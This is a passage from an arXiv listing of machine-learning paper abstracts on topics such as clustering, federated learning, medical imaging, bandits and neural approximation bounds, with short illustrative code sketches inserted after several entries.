    We study the generalization properties of batched predictors, i.e., models tasked with predicting the mean label of a small set (or batch) of examples. The batched prediction paradigm is particularly relevant for models deployed to determine the quality of a group of compounds in preparation for offline testing. By utilizing a suitable generalization of the Rademacher complexity, we prove that batched predictors come with exponentially stronger generalization guarantees as compared to the standard per-sample approach. Surprisingly, the proposed bound holds independently of overparametrization. Our theoretical insights are validated experimentally for various tasks, architectures, and applications.
    Contrastive Representation Disentanglement for Clustering. (arXiv:2306.05439v2 [cs.LG] UPDATED)
    Clustering continues to be a significant and challenging task. Recent studies have demonstrated impressive results by applying clustering to feature representations acquired through self-supervised learning, particularly on small datasets. However, when dealing with datasets containing a large number of clusters, such as ImageNet, current methods struggle to achieve satisfactory clustering performance. In this paper, we introduce a novel method called Contrastive representation Disentanglement for Clustering (CDC) that leverages contrastive learning to directly disentangle the feature representation for clustering. In CDC, we decompose the representation into two distinct components: one component encodes categorical information under an equipartition constraint, and the other component captures instance-specific factors. To train our model, we propose a contrastive loss that effectively utilizes both components of the representation. We conduct a theoretical analysis of the proposed loss and highlight how it assigns different weights to negative samples during the process of disentangling the feature representation. Further analysis of the gradients reveals that larger weights emphasize a stronger focus on hard negative samples. As a result, the proposed loss exhibits strong expressiveness, enabling efficient disentanglement of categorical information. Through experimental evaluation on various benchmark datasets, our method demonstrates either state-of-the-art or highly competitive clustering performance. Notably, on the complete ImageNet dataset, we achieve an accuracy of 53.4%, surpassing existing methods by a substantial margin of +10.2%.
    Mining of Single-Class by Active Learning for Semantic Segmentation. (arXiv:2307.09109v1 [cs.LG])
    Several Active Learning (AL) policies require retraining a target model several times in order to identify the most informative samples, and rarely offer the option to focus on acquiring samples from underrepresented classes. Here, the Mining of Single-Class by Active Learning (MiSiCAL) paradigm is introduced, in which an AL policy is constructed through deep reinforcement learning and exploits quantity-accuracy correlations to build datasets on which high-performance models can be trained with regard to specific classes. MiSiCAL is especially helpful in the case of very large batch sizes, since it does not require the repeated model training sessions common in other AL methods. This is thanks to its ability to exploit fixed representations of the candidate data points. We find that MiSiCAL is able to outperform a random policy on 150 out of 171 COCO10k classes, while the strongest baseline only outperforms random on 101 classes.
    ACTION++: Improving Semi-supervised Medical Image Segmentation with Adaptive Anatomical Contrast. (arXiv:2304.02689v3 [cs.CV] UPDATED)
    Medical data often exhibits long-tail distributions with heavy class imbalance, which naturally leads to difficulty in classifying the minority classes (i.e., boundary regions or rare objects). Recent work has significantly improved semi-supervised medical image segmentation in long-tailed scenarios by equipping them with unsupervised contrastive criteria. However, it remains unclear how well they will perform in the labeled portion of data where class distribution is also highly imbalanced. In this work, we present ACTION++, an improved contrastive learning framework with adaptive anatomical contrast for semi-supervised medical segmentation. Specifically, we propose an adaptive supervised contrastive loss, where we first compute the optimal locations of class centers uniformly distributed on the embedding space (i.e., off-line), and then perform online contrastive matching training by encouraging different class features to adaptively match these distinct and uniformly distributed class centers. Moreover, we argue that blindly adopting a constant temperature $\tau$ in the contrastive loss on long-tailed medical data is not optimal, and propose to use a dynamic $\tau$ via a simple cosine schedule to yield better separation between majority and minority classes. Empirically, we evaluate ACTION++ on ACDC and LA benchmarks and show that it achieves state-of-the-art across two semi-supervised settings. Theoretically, we analyze the performance of adaptive anatomical contrast and confirm its superiority in label efficiency.
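The dynamic temperature $\tau$ via a simple cosine schedule can be sketched as follows (the endpoint values `tau_max` and `tau_min` below are illustrative assumptions, not the paper's settings):

```python
import math

def cosine_tau(step, total_steps, tau_min=0.07, tau_max=1.0):
    """Anneal the contrastive temperature from tau_max down to tau_min
    over training following a half-cosine curve."""
    cos = 0.5 * (1.0 + math.cos(math.pi * step / total_steps))
    return tau_min + (tau_max - tau_min) * cos
```

A larger early temperature tolerates a spread-out embedding, while the smaller late temperature sharpens the contrastive loss, which the paper argues yields better separation between majority and minority classes than a constant $\tau$.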
    Bayesian Safe Policy Learning with Chance Constrained Optimization: Application to Military Security Assessment during the Vietnam War. (arXiv:2307.08840v1 [cs.LG])
    Algorithmic and data-driven decisions and recommendations are commonly used in high-stakes decision-making settings such as criminal justice, medicine, and public policy. We investigate whether it would have been possible to improve a security assessment algorithm employed during the Vietnam War, using outcomes measured immediately after its introduction in late 1969. This empirical application raises several methodological challenges that frequently arise in high-stakes algorithmic decision-making. First, before implementing a new algorithm, it is essential to characterize and control the risk of yielding worse outcomes than the existing algorithm. Second, the existing algorithm is deterministic, and learning a new algorithm requires transparent extrapolation. Third, the existing algorithm involves discrete decision tables that are common but difficult to optimize over. To address these challenges, we introduce the Average Conditional Risk (ACRisk), which first quantifies the risk that a new algorithmic policy leads to worse outcomes for subgroups of individual units and then averages this over the distribution of subgroups. We also propose a Bayesian policy learning framework that maximizes the posterior expected value while controlling the posterior expected ACRisk. This framework separates the estimation of heterogeneous treatment effects from policy optimization, enabling flexible estimation of effects and optimization over complex policy classes. We characterize the resulting chance-constrained optimization problem as a constrained linear programming problem. Our analysis shows that compared to the actual algorithm used during the Vietnam War, the learned algorithm assesses most regions as more secure and emphasizes economic and political factors over military factors.
    Learning to Select SAT Encodings for Pseudo-Boolean and Linear Integer Constraints. (arXiv:2307.09342v1 [cs.AI])
    Many constraint satisfaction and optimisation problems can be solved effectively by encoding them as instances of the Boolean Satisfiability problem (SAT). However, even the simplest types of constraints have many encodings in the literature with widely varying performance, and the problem of selecting suitable encodings for a given problem instance is not trivial. We explore the problem of selecting encodings for pseudo-Boolean and linear constraints using a supervised machine learning approach. We show that it is possible to select encodings effectively using a standard set of features for constraint problems; however we obtain better performance with a new set of features specifically designed for the pseudo-Boolean and linear constraints. In fact, we achieve good results when selecting encodings for unseen problem classes. Our results compare favourably to AutoFolio when using the same feature set. We discuss the relative importance of instance features to the task of selecting the best encodings, and compare several variations of the machine learning method.
    Biomaker CA: a Biome Maker project using Cellular Automata. (arXiv:2307.09320v1 [cs.AI])
    We introduce Biomaker CA: a Biome Maker project using Cellular Automata (CA). In Biomaker CA, morphogenesis is a first class citizen and small seeds need to grow into plant-like organisms to survive in a nutrient starved environment and eventually reproduce with variation so that a biome survives for long timelines. We simulate complex biomes by means of CA rules in 2D grids and parallelize all of its computation on GPUs through the Python JAX framework. We show how this project allows for several different kinds of environments and laws of 'physics', alongside different model architectures and mutation strategies. We further analyze some configurations to show how plant agents can grow, survive, reproduce, and evolve, forming stable and unstable biomes. We then demonstrate how one can meta-evolve models to survive in a harsh environment either through end-to-end meta-evolution or by a more surgical and efficient approach, called Petri dish meta-evolution. Finally, we show how to perform interactive evolution, where the user decides how to evolve a plant model interactively and then deploys it in a larger environment. We open source Biomaker CA at: https://tinyurl.com/2x8yu34s .
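For readers new to cellular automata, the kind of synchronous 2-D grid update that Biomaker CA parallelizes on GPUs can be sketched in plain Python (Biomaker's actual rules govern nutrient exchange and plant growth and are far richer; this toy uses a generic neighbor-count rule):

```python
def ca_step(grid, rule):
    """One synchronous cellular-automaton update on a 2-D grid.

    grid: list of rows of integer cell states, toroidal wrap-around.
    rule: callable (state, live_neighbors) -> new state.
    """
    h, w = len(grid), len(grid[0])
    nxt = [[0] * w for _ in range(h)]
    for i in range(h):
        for j in range(w):
            # count live cells in the 8-cell Moore neighborhood
            n = sum(grid[(i + di) % h][(j + dj) % w]
                    for di in (-1, 0, 1) for dj in (-1, 0, 1)
                    if (di, dj) != (0, 0))
            nxt[i][j] = rule(grid[i][j], n)
    return nxt
```

In JAX the same update is expressed as a vectorized convolution over the whole grid, which is what makes GPU parallelization of large biomes straightforward.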
    UniTabE: Pretraining a Unified Tabular Encoder for Heterogeneous Tabular Data. (arXiv:2307.09249v1 [cs.LG])
    Recent advancements in Natural Language Processing (NLP) have witnessed the groundbreaking impact of pretrained models, yielding impressive outcomes across various tasks. This study seeks to extend the power of pretraining methodologies to tabular data, a domain traditionally overlooked, yet inherently challenging due to the plethora of table schemas intrinsic to different tasks. The primary research questions underpinning this work revolve around the adaptation to heterogeneous table structures, the establishment of a universal pretraining protocol for tabular data, the generalizability and transferability of learned knowledge across tasks, the adaptation to diverse downstream applications, and the incorporation of incremental columns over time. In response to these challenges, we introduce UniTabE, a pioneering method designed to process tables in a uniform manner, devoid of constraints imposed by specific table structures. UniTabE's core concept relies on representing each basic table element with a module, termed TabUnit. This is subsequently followed by a Transformer encoder to refine the representation. Moreover, our model is designed to facilitate pretraining and finetuning through the utilization of free-form prompts. In order to implement the pretraining phase, we curated an expansive tabular dataset comprising approximately 13 billion samples, meticulously gathered from the Kaggle platform. Rigorous experimental testing and analyses were performed under a myriad of scenarios to validate the effectiveness of our methodology. The experimental results demonstrate UniTabE's superior performance against several baseline models across a multitude of benchmark datasets. This, therefore, underscores UniTabE's potential to significantly enhance the semantic representation of tabular data, thereby marking a significant stride in the field of tabular data analysis.
    Local or Global: Selective Knowledge Assimilation for Federated Learning with Limited Labels. (arXiv:2307.08809v1 [cs.LG])
    Many existing FL methods assume clients with fully-labeled data, while in realistic settings, clients have limited labels due to the expensive and laborious process of labeling. Limited labeled local data often leaves a client's local model with poor generalization to its larger unlabeled local data, for example through class-distribution mismatch with the unlabeled data. As a result, clients may instead look to benefit from the global model trained across clients to leverage their unlabeled data, but this also becomes difficult due to data heterogeneity across clients. In our work, we propose FedLabel, where clients selectively choose the local or global model to pseudo-label their unlabeled data, depending on which is more of an expert on the data. We further utilize both the local and global models' knowledge via global-local consistency regularization, which minimizes the divergence between the two models' outputs when they have identical pseudo-labels for the unlabeled data. Unlike other semi-supervised FL baselines, our method does not require additional experts other than the local or global model, nor additional parameters to be communicated. We also do not assume any server-labeled data or fully labeled clients. For both cross-device and cross-silo settings, we show that FedLabel outperforms other semi-supervised FL baselines by $8$-$24\%$, and even outperforms standard fully supervised FL baselines ($100\%$ labeled data) with only $5$-$20\%$ of labeled data.
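One simple instantiation of "choose whichever model is more of an expert" is to pseudo-label with the more confident model (a hedged sketch; the abstract does not specify FedLabel's actual selection criterion, so confidence-based selection is an assumption):

```python
def select_pseudo_label(local_probs, global_probs):
    """Pseudo-label an unlabeled sample with the more confident model.

    local_probs, global_probs: class-probability lists from the local
    and global models. Returns the chosen class index.
    """
    local_conf, global_conf = max(local_probs), max(global_probs)
    probs = local_probs if local_conf >= global_conf else global_probs
    return probs.index(max(probs))
```

The consistency-regularization term then only compares the two models' outputs on samples where both produce the same pseudo-label.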
    Online Learning with Costly Features in Non-stationary Environments. (arXiv:2307.09388v1 [cs.LG])
    Maximizing long-term rewards is the primary goal in sequential decision-making problems. The majority of existing methods assume that side information is freely available, enabling the learning agent to observe all features' states before making a decision. In real-world problems, however, collecting beneficial information is often costly. That implies that, besides individual arms' reward, learning the observations of the features' states is essential to improve the decision-making strategy. The problem is aggravated in a non-stationary environment where reward and cost distributions undergo abrupt changes over time. To address the aforementioned dual learning problem, we extend the contextual bandit setting and allow the agent to observe subsets of features' states. The objective is to maximize the long-term average gain, which is the difference between the accumulated rewards and the paid costs on average. Therefore, the agent faces a trade-off between minimizing the cost of information acquisition and possibly improving the decision-making process using the obtained information. To this end, we develop an algorithm that guarantees a sublinear regret in time. Numerical results demonstrate the superiority of our proposed policy in a real-world scenario.
    Automated Ableism: An Exploration of Explicit Disability Biases in Sentiment and Toxicity Analysis Models. (arXiv:2307.09209v1 [cs.CL])
    We analyze sentiment analysis and toxicity detection models to detect the presence of explicit bias against people with disability (PWD). We employ the bias identification framework of Perturbation Sensitivity Analysis to examine conversations related to PWD on social media platforms, specifically Twitter and Reddit, in order to gain insight into how disability bias is disseminated in real-world social settings. We then create the \textit{Bias Identification Test in Sentiment} (BITS) corpus to quantify explicit disability bias in any sentiment analysis and toxicity detection models. Our study utilizes BITS to uncover significant biases in four open AIaaS (AI as a Service) sentiment analysis tools, namely TextBlob, VADER, Google Cloud Natural Language API, DistilBERT and two toxicity detection models, namely two versions of Toxic-BERT. Our findings indicate that all of these models exhibit statistically significant explicit bias against PWD.
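A perturbation-sensitivity check of the kind the BITS corpus builds on can be sketched as follows. The function name, the template/slot interface, and the neutral baseline term are illustrative assumptions, not the actual Perturbation Sensitivity Analysis protocol or BITS itself.

```python
def perturbation_sensitivity(templates, identity_terms, score, neutral="person"):
    """Perturbation-sensitivity sketch: fill each template's slot with each
    identity term and measure how far the model's score moves from its score
    with a neutral term; a systematic shift indicates bias tied to the
    identity terms themselves rather than to sentence content."""
    shifts = []
    for tpl in templates:
        base = score(tpl.format(term=neutral))
        shifts.extend(score(tpl.format(term=t)) - base for t in identity_terms)
    return sum(shifts) / len(shifts)
```

With any callable `score` mapping text to a sentiment or toxicity score, a consistently negative mean shift for disability terms would signal the kind of explicit bias the study reports.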
    Adaptive Topological Feature via Persistent Homology: Filtration Learning for Point Clouds. (arXiv:2307.09259v1 [cs.LG])
    Machine learning for point clouds has been attracting much attention, with many applications in various fields, such as shape recognition and material science. To enhance the accuracy of such machine learning methods, it is known to be effective to incorporate global topological features, which are typically extracted by persistent homology. In the calculation of persistent homology for a point cloud, we need to choose a filtration for the point clouds, an increasing sequence of spaces. Because the performance of machine learning methods combined with persistent homology is highly affected by the choice of a filtration, we need to tune it depending on data and tasks. In this paper, we propose a framework that learns a filtration adaptively with the use of neural networks. In order to make the resulting persistent homology isometry-invariant, we develop a neural network architecture with such invariance. Additionally, we theoretically show a finite-dimensional approximation result that justifies our architecture. Experimental results demonstrated the efficacy of our framework in several classification tasks.
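For intuition about the objects being tuned: the finite 0-dimensional persistence bars of the Vietoris-Rips filtration of a point cloud all appear at time 0 and die exactly at the edge lengths of a minimum spanning tree, which a short Kruskal-style union-find pass computes. This sketch covers only a fixed filtration; the paper's contribution is learning the filtration itself with an isometry-invariant neural network.

```python
import math
from itertools import combinations

def h0_death_times(points):
    """Death times of the finite 0-dimensional persistence bars of the
    Vietoris-Rips filtration: process edges in increasing length order
    and record the length at which two connected components merge."""
    n = len(points)
    parent = list(range(n))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]  # path halving
            i = parent[i]
        return i

    edges = sorted(
        (math.dist(points[i], points[j]), i, j)
        for i, j in combinations(range(n), 2)
    )
    deaths = []
    for d, i, j in edges:
        ri, rj = find(i), find(j)
        if ri != rj:  # two components merge: one bar dies at filtration value d
            parent[ri] = rj
            deaths.append(d)
    return deaths
```

Higher-dimensional persistence, as used for the paper's global topological features, requires a full boundary-matrix reduction and is typically delegated to a library.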
    Mitigating Label Bias via Decoupled Confident Learning. (arXiv:2307.08945v1 [cs.LG])
    Growing concerns regarding algorithmic fairness have led to a surge in methodologies to mitigate algorithmic bias. However, such methodologies largely assume that observed labels in training data are correct. This is problematic because bias in labels is pervasive across important domains, including healthcare, hiring, and content moderation. In particular, human-generated labels are prone to encoding societal biases. While the presence of labeling bias has been discussed conceptually, there is a lack of methodologies to address this problem. We propose a pruning method -- Decoupled Confident Learning (DeCoLe) -- specifically designed to mitigate label bias. After illustrating its performance on a synthetic dataset, we apply DeCoLe in the context of hate speech detection, where label bias has been recognized as an important challenge, and show that it successfully identifies biased labels and outperforms competing approaches.
    Privacy-preserving patient clustering for personalized federated learning. (arXiv:2307.08847v1 [cs.LG])
    Federated Learning (FL) is a machine learning framework that enables multiple organizations to train a model without sharing their data with a central server. However, it experiences significant performance degradation if the data is not independent and identically distributed (non-IID). This is a problem in medical settings, where variations in the patient population contribute significantly to distribution differences across hospitals. Personalized FL addresses this issue by accounting for site-specific distribution differences. Clustered FL, a Personalized FL variant, addresses this problem by clustering patients into groups across hospitals and training separate models on each group. However, privacy remained a challenge, as the clustering process requires the exchange of patient-level information. This was previously solved by forming clusters using aggregated data, which led to inaccurate groups and performance degradation. In this study, we propose Privacy-preserving Community-Based Federated machine Learning (PCBFL), a novel Clustered FL framework that can cluster patients using patient-level data while protecting privacy. PCBFL uses Secure Multiparty Computation, a cryptographic technique, to securely calculate patient-level similarity scores across hospitals. We then evaluate PCBFL by training a federated mortality prediction model using 20 sites from the eICU dataset. We compare the performance gain from PCBFL against traditional and existing Clustered FL frameworks. Our results show that PCBFL successfully forms clinically meaningful cohorts of low-, medium-, and high-risk patients. PCBFL outperforms traditional and existing Clustered FL frameworks with an average AUC improvement of 4.3% and AUPRC improvement of 7.8%.
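The cryptographic primitive underlying such protocols, additive secret sharing, can be sketched in a few lines. PCBFL's actual protocol computes patient-level similarity scores, which needs more machinery than this secure-sum toy; the point here is only that an aggregator can reconstruct a total while every individual share it sees is uniformly random.

```python
import random

def secure_sum(secrets, n_shares=3, modulus=2**31 - 1):
    """Additive secret sharing sketch: each party splits its secret into
    random shares that sum to the secret mod p and sends one share to
    each aggregation server; summing the per-server subtotals recovers
    the total without any server learning an individual secret."""
    all_shares = []
    for s in secrets:
        shares = [random.randrange(modulus) for _ in range(n_shares - 1)]
        shares.append((s - sum(shares)) % modulus)  # shares sum to s mod p
        all_shares.append(shares)
    # Each "server" sums one share from every party.
    subtotals = [sum(col) % modulus for col in zip(*all_shares)]
    return sum(subtotals) % modulus
```

Secure computation of inner-product similarities additionally requires multiplication on shares (e.g., Beaver triples), which is beyond this sketch.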
    How Many Neurons Does it Take to Approximate the Maximum?. (arXiv:2307.09212v1 [cs.LG])
    We study the size of a neural network needed to approximate the maximum function over $d$ inputs, in the most basic setting of approximating with respect to the $L_2$ norm, for continuous distributions, for a network that uses ReLU activations. We provide new lower and upper bounds on the width required for approximation across various depths. Our results establish new depth separations between depth 2 and 3, and depth 3 and 5 networks, as well as providing a depth $\mathcal{O}(\log(\log(d)))$ and width $\mathcal{O}(d)$ construction which approximates the maximum function, significantly improving upon the depth requirements of the best previously known bounds for networks with linearly-bounded width. Our depth separation results are facilitated by a new lower bound for depth 2 networks approximating the maximum function over the uniform distribution, assuming an exponential upper bound on the size of the weights. Furthermore, we are able to use this depth 2 lower bound to provide tight bounds on the number of neurons needed to approximate the maximum by a depth 3 network. Our lower bounds are of potentially broad interest as they apply to the widely studied and used \emph{max} function, in contrast to many previous results that base their bounds on specially constructed or pathological functions and distributions.
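The classical constructions the paper improves on are easy to make concrete: max(a,b) = (a + b + |a - b|)/2 with |x| = relu(x) + relu(-x), and a balanced pairwise reduction then computes the maximum of d inputs at depth O(log d). The sketch below shows only this baseline; the paper's O(log log d)-depth construction is more involved.

```python
def relu(x):
    return max(0.0, x)

def max2(a, b):
    """max(a, b) from ReLU units only:
    max(a, b) = (a + b + |a - b|) / 2 and |x| = relu(x) + relu(-x)."""
    return 0.5 * (a + b + relu(a - b) + relu(b - a))

def max_tree(xs):
    """Balanced pairwise reduction: a ReLU network of depth O(log d)
    computing the maximum of d inputs (assumes a non-empty list)."""
    while len(xs) > 1:
        xs = [max2(xs[i], xs[i + 1]) for i in range(0, len(xs) - 1, 2)] + \
             (xs[-1:] if len(xs) % 2 else [])
    return xs[0]
```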
    Unified Off-Policy Learning to Rank: a Reinforcement Learning Perspective. (arXiv:2306.07528v2 [cs.LG] UPDATED)
    Off-policy Learning to Rank (LTR) aims to optimize a ranker from data collected by a deployed logging policy. However, existing off-policy learning to rank methods often make strong assumptions about how users generate the click data, i.e., the click model, and hence need to tailor their methods specifically under different click models. In this paper, we unify the ranking process under general stochastic click models as a Markov Decision Process (MDP), so that the optimal ranking can be learned directly with offline reinforcement learning (RL). Building upon this, we leverage offline RL techniques for off-policy LTR and propose the Click Model-Agnostic Unified Off-policy Learning to Rank (CUOLR) method, which can be easily applied to a wide range of click models. Through a dedicated formulation of the MDP, we show that offline RL algorithms can adapt to various click models without complex debiasing techniques and prior knowledge of the model. Results on various large-scale datasets demonstrate that CUOLR consistently outperforms the state-of-the-art off-policy learning to rank algorithms while maintaining consistency and robustness under different click models.
    Using the IBM Analog In-Memory Hardware Acceleration Kit for Neural Network Training and Inference. (arXiv:2307.09357v1 [cs.ET])
    Analog In-Memory Computing (AIMC) is a promising approach to reduce the latency and energy consumption of Deep Neural Network (DNN) inference and training. However, the noisy and non-linear device characteristics, and the non-ideal peripheral circuitry in AIMC chips, require adapting DNNs to be deployed on such hardware to achieve equivalent accuracy to digital computing. In this tutorial, we provide a deep dive into how such adaptations can be achieved and evaluated using the recently released IBM Analog Hardware Acceleration Kit (AIHWKit), freely available at https://github.com/IBM/aihwkit. The AIHWKit is a Python library that simulates inference and training of DNNs using AIMC. We present an in-depth description of the AIHWKit design, functionality, and best practices to properly perform inference and training. We also present an overview of the Analog AI Cloud Composer, which provides the benefits of using the AIHWKit simulation platform in a fully managed cloud setting. Finally, we show examples of how users can expand and customize AIHWKit for their own needs. This tutorial is accompanied by comprehensive Jupyter Notebook code examples that can be run using AIHWKit, which can be downloaded from https://github.com/IBM/aihwkit/tree/master/notebooks/tutorial.
    Comparative Performance Evaluation of Large Language Models for Extracting Molecular Interactions and Pathway Knowledge. (arXiv:2307.08813v1 [cs.CL])
    Understanding protein interactions and pathway knowledge is crucial for unraveling the complexities of living systems and investigating the underlying mechanisms of biological functions and complex diseases. While existing databases provide curated biological data from literature and other sources, they are often incomplete and their maintenance is labor-intensive, necessitating alternative approaches. In this study, we propose to harness the capabilities of large language models to address these issues by automatically extracting such knowledge from the relevant scientific literature. Toward this goal, in this work, we investigate the effectiveness of different large language models in tasks that involve recognizing protein interactions, pathways, and gene regulatory relations. We thoroughly evaluate the performance of various models, highlight the significant findings, and discuss both the future opportunities and the remaining challenges associated with this approach. The code and data are available at: https://github.com/boxorange/BioIE-LLM
    The Role of Transparency in Repeated First-Price Auctions with Unknown Valuations. (arXiv:2307.09478v1 [cs.GT])
    We study the problem of regret minimization for a single bidder in a sequence of first-price auctions where the bidder knows the item's value only if the auction is won. Our main contribution is a complete characterization, up to logarithmic factors, of the minimax regret in terms of the auction's transparency, which regulates the amount of information on competing bids disclosed by the auctioneer at the end of each auction. Our results hold under different assumptions (stochastic, adversarial, and their smoothed variants) on the environment generating the bidder's valuations and competing bids. These minimax rates reveal how the interplay between transparency and the nature of the environment affects how fast one can learn to bid optimally in first-price auctions.
    Operator Guidance Informed by AI-Augmented Simulations. (arXiv:2307.08810v1 [cs.AI])
    This paper presents a multi-fidelity, data-adaptive approach with a Long Short-Term Memory (LSTM) neural network to estimate ship response statistics in bimodal, bidirectional seas. The study employs a fast, low-fidelity, volume-based tool, SimpleCode, and a higher-fidelity tool known as the Large Amplitude Motion Program (LAMP). SimpleCode and LAMP training data were generated under common bimodal, bidirectional sea conditions in the North Atlantic. After training an LSTM network with LAMP ship motion response data, a sample route was traversed, randomly sampled historical weather was input into SimpleCode and the LSTM network, and the outputs were compared against the higher-fidelity results.
    Anomaly Detection with Selective Dictionary Learning. (arXiv:2307.08807v1 [cs.LG])
    In this paper we present new methods of anomaly detection based on Dictionary Learning (DL) and Kernel Dictionary Learning (KDL). The main contribution is the adaptation of known DL and KDL algorithms into unsupervised methods for outlier detection. We propose a reduced kernel version (RKDL), which is useful for problems with large data sets, where the full kernel matrix would otherwise be prohibitively large. We also improve the DL and RKDL methods through a random selection of signals, which aims to eliminate the outliers from the training procedure. All our algorithms are included in an anomaly detection toolbox and are compared to standard benchmark results.
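The basic dictionary-learning anomaly score, the residual left after approximating a signal with a few dictionary atoms, can be sketched with greedy matching pursuit. This assumes unit-norm atoms and is only the scoring step; the paper's trained dictionaries and kernel variants go well beyond it.

```python
import math

def _dot(u, v):
    return sum(a * b for a, b in zip(u, v))

def anomaly_score(x, dictionary, n_atoms=1):
    """Dictionary-based anomaly score sketch: greedily approximate x with
    a few unit-norm atoms (matching pursuit) and report the norm of the
    residual -- signals the dictionary explains poorly score high."""
    residual = list(x)
    for _ in range(n_atoms):
        # pick the atom most correlated with the current residual
        best = max(dictionary, key=lambda d: abs(_dot(residual, d)))
        coef = _dot(residual, best)
        residual = [r - coef * d for r, d in zip(residual, best)]
    return math.sqrt(_dot(residual, residual))
```

Signals whose score exceeds a chosen threshold would be declared outliers.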
    Accuracy versus time frontiers of semi-supervised and self-supervised learning on medical images. (arXiv:2307.08919v1 [cs.CV])
    For many applications of classifiers to medical images, a trustworthy label for each image can be difficult or expensive to obtain. In contrast, images without labels are more readily available. Two major research directions both promise that additional unlabeled data can improve classifier performance: self-supervised learning pretrains useful representations on unlabeled data only, then fine-tunes a classifier on these representations via the labeled set; semi-supervised learning directly trains a classifier on labeled and unlabeled data simultaneously. Recent methods from both directions have claimed significant gains on non-medical tasks, but do not systematically assess medical images and mostly compare only to methods in the same direction. This study contributes a carefully-designed benchmark to help answer a practitioner's key question: given a small labeled dataset and a limited budget of hours to spend on training, what gains from additional unlabeled images are possible and which methods best achieve them? Unlike previous benchmarks, ours uses realistic-sized validation sets to select hyperparameters, assesses runtime-performance tradeoffs, and bridges two research fields. By comparing 6 semi-supervised methods and 5 self-supervised methods to strong labeled-only baselines on 3 medical datasets with 30-1000 labels per class, we offer insights to resource-constrained, results-focused practitioners: MixMatch, SimCLR, and BYOL represent strong choices that were not surpassed by more recent methods. After much effort selecting hyperparameters on one dataset, we publish settings that enable strong methods to perform well on new medical tasks within a few hours, with further search over dozens of hours delivering modest additional gains.
    Evaluating unsupervised disentangled representation learning for genomic discovery and disease risk prediction. (arXiv:2307.08893v1 [cs.LG])
    High-dimensional clinical data have become invaluable resources for genetic studies, due to their accessibility in biobank-scale datasets and the development of high performance modeling techniques especially using deep learning. Recent work has shown that low dimensional embeddings of these clinical data learned by variational autoencoders (VAE) can be used for genome-wide association studies and polygenic risk prediction. In this work, we consider multiple unsupervised learning methods for learning disentangled representations, namely autoencoders, VAE, beta-VAE, and FactorVAE, in the context of genetic association studies. Using spirograms from UK Biobank as a running example, we observed improvements in the number of genome-wide significant loci, heritability, and performance of polygenic risk scores for asthma and chronic obstructive pulmonary disease by using FactorVAE or beta-VAE, compared to standard VAE or non-variational autoencoders. FactorVAEs performed effectively across multiple values of the regularization hyperparameter, while beta-VAEs were much more sensitive to the hyperparameter values.
    Limitations of Information-Theoretic Generalization Bounds for Gradient Descent Methods in Stochastic Convex Optimization. (arXiv:2212.13556v3 [cs.LG] UPDATED)
    To date, no "information-theoretic" frameworks for reasoning about generalization error have been shown to establish minimax rates for gradient descent in the setting of stochastic convex optimization. In this work, we consider the prospect of establishing such rates via several existing information-theoretic frameworks: input-output mutual information bounds, conditional mutual information bounds and variants, PAC-Bayes bounds, and recent conditional variants thereof. We prove that none of these bounds are able to establish minimax rates. We then consider a common tactic employed in studying gradient methods, whereby the final iterate is corrupted by Gaussian noise, producing a noisy "surrogate" algorithm. We prove that minimax rates cannot be established via the analysis of such surrogates. Our results suggest that new ideas are required to analyze gradient descent using information-theoretic techniques.
    Context-Conditional Navigation with a Learning-Based Terrain- and Robot-Aware Dynamics Model. (arXiv:2307.09206v1 [cs.RO])
    In autonomous navigation settings, several quantities can be subject to variations. Terrain properties such as friction coefficients may vary over time depending on the location of the robot. Also, the dynamics of the robot may change due to, e.g., different payloads, changing the system's mass, or wear and tear, changing actuator gains or joint friction. An autonomous agent should thus be able to adapt to such variations. In this paper, we develop a novel probabilistic, terrain- and robot-aware forward dynamics model, termed TRADYN, which is able to adapt to the above-mentioned variations. It builds on recent advances in meta-learning forward dynamics models based on Neural Processes. We evaluate our method in a simulated 2D navigation setting with a unicycle-like robot and different terrain layouts with spatially varying friction coefficients. In our experiments, the proposed model exhibits lower prediction error for the task of long-horizon trajectory prediction, compared to non-adaptive ablation models. We also evaluate our model on the downstream task of navigation planning, which demonstrates improved performance in planning control-efficient paths by taking robot and terrain properties into account.
    Geometric Ultrasound Localization Microscopy. (arXiv:2306.15548v3 [cs.CV] UPDATED)
    Contrast-Enhanced Ultra-Sound (CEUS) has become a viable method for non-invasive, dynamic visualization in medical diagnostics, yet Ultrasound Localization Microscopy (ULM) has enabled a revolutionary breakthrough by offering ten times higher resolution. To date, Delay-And-Sum (DAS) beamformers are used to render ULM frames, ultimately determining the image resolution capability. To take full advantage of ULM, this study questions whether beamforming is the most effective processing step for ULM, suggesting an alternative approach that relies solely on Time-Difference-of-Arrival (TDoA) information. To this end, a novel geometric framework for micro bubble localization via ellipse intersections is proposed to overcome existing beamforming limitations. We present a benchmark comparison based on a public dataset for which our geometric ULM outperforms existing baseline methods in terms of accuracy and robustness while only utilizing a portion of the available transducer data.
    Internally Rewarded Reinforcement Learning. (arXiv:2302.00270v2 [cs.LG] UPDATED)
    We study a class of reinforcement learning problems where the reward signals for policy learning are generated by a discriminator that is dependent on and jointly optimized with the policy. This interdependence between the policy and the discriminator leads to an unstable learning process because reward signals from an immature discriminator are noisy and impede policy learning, and conversely, an under-optimized policy impedes discriminator learning. We call this learning setting \textit{Internally Rewarded Reinforcement Learning} (IRRL) as the reward is not provided directly by the environment but \textit{internally} by the discriminator. In this paper, we formally formulate IRRL and present a class of problems that belong to IRRL. We theoretically derive and empirically analyze the effect of the reward function in IRRL and based on these analyses propose the clipped linear reward function. Experimental results show that the proposed reward function can consistently stabilize the training process by reducing the impact of reward noise, which leads to faster convergence and higher performance compared with baselines in diverse tasks.
    Best-of-three-worlds Analysis for Linear Bandits with Follow-the-regularized-leader Algorithm. (arXiv:2303.06825v2 [cs.LG] UPDATED)
    The linear bandit problem has been studied for many years in both stochastic and adversarial settings. Designing an algorithm that can optimize the environment without knowing the loss type attracts lots of interest. \citet{LeeLWZ021} propose an algorithm that actively detects the loss type and then switches between different algorithms specially designed for specific settings. However, such an approach requires meticulous designs to perform well in all environments. Follow-the-regularized-leader (FTRL) is another type of popular algorithm that can adapt to different environments. This algorithm is of simple design and the regret bounds are shown to be optimal in traditional multi-armed bandit problems compared with the detect-switch type. Designing an FTRL-type algorithm for linear bandits is an important question that has been open for a long time. In this paper, we prove that the FTRL algorithm with a negative entropy regularizer can achieve the best-of-three-world results for the linear bandit problem. Our regret bounds achieve the same or nearly the same order as the previous detect-switch type algorithm but with a much simpler algorithmic design.
